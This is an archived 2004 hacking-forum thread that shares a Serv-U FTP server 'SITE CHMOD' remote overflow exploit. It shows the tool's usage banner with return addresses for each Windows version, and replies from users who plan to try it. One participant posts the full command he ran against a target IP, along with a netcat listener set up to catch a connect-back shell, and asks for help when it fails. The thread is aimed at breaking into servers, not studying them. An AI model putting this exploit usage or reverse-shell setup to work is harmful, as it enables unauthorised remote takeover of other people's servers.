kkkk
Feb 6 2004, 01:50 AM
So,
| CODE |
Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V2.0
Bug find by kkqq kkqq@0x557.org, Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Usage: servu <-i ip> <-t type>
[-u user] [-p pass] [-d dir]
[-f ftpport] [-c cbhost] [-s shellport]
[type]:
0 0x7801d07b Serv-U v3.0.0.20~v4.1.0.11 ALL 2K SP3/SP4
1 0x77c22ca7 Serv-U v3.0.0.20~v4.1.0.11 ALL XP SP1
2 0x7ffa1571 Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP/2K3 ALL
3 0x7ffa1c1b Serv-U v3.0.0.20~v4.1.0.11 EN 2K/XP/2K3 ALL
4 0x7ffa4a1b Serv-U v3.0.0.20~v4.1.0.11 GB 2K ALL
5 0x7ffa2186 Serv-U v3.0.0.20~v4.1.0.11 TW 2K ALL
6 0x6dee6713 Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4
7 0x77886713 Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4
8 0x76b42a3a Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1 |
That's all for now..
kkkk
SecureD
Feb 6 2004, 02:49 AM
tnx dude gonna check it out!
labbertasche
Feb 6 2004, 07:24 AM
thx, my compiling test with the source has 1 errr
let's test
greets
labbertasche
nolimit
Feb 6 2004, 09:59 AM
I already compiled this in an earlier thread...
Imps2
Feb 6 2004, 02:27 PM
Thank m8 gonna give it a try
Greetz Imps2
Thom
Feb 8 2004, 09:32 PM
I couldnt get this working
I used
servu -i VULNERABLE.IP -u 140 -p giga -d / -f 1563 -c IP.that.has.netcat.listening -s 899 -t 0
IP.that.has.netcat.listening used nc -l -vv -p 899
any ideas? need this working :\
Thom
Feb 8 2004, 09:34 PM
The error returned was:
[-] Bind port on IP.that.has.netcat.listening:899 error.
[-] You must run nc get the shell.
I tried to have netcat listening on few friends computers which dont have router nor firewall....
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
